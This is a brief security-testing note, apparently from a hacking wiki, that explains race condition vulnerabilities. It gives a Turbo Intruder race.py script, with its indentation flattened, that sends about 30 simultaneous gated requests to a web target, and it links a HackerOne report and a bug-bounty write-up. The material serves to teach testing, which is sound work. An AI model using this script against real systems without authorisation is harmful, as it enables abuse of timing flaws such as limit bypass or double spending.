A race condition vulnerability occurs when the behavior or outcome of a system or program depends on the timing or sequence of events, and multiple processes or threads compete for shared resources or data. This can result in unexpected or erroneous behavior, including security vulnerabilities, if the processes or threads don't coordinate properly. For example, if two processes try to write to the same file at the same time, the file may end up with unexpected or corrupted data.
Utilizing Turbo Intruder, we can leverage the race.py
script to send a request several times in an extremely short period of time:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=30,
pipeline=False
)
for i in range(30):
engine.queue(target.req, i)
engine.queue(target.req, target.baseInput, gate='race1')
engine.start(timeout=5)
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)
{% embed url="https://hackerone.com/reports/759247" %}
{% embed url="https://pravinponnusamy.medium.com/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43" %}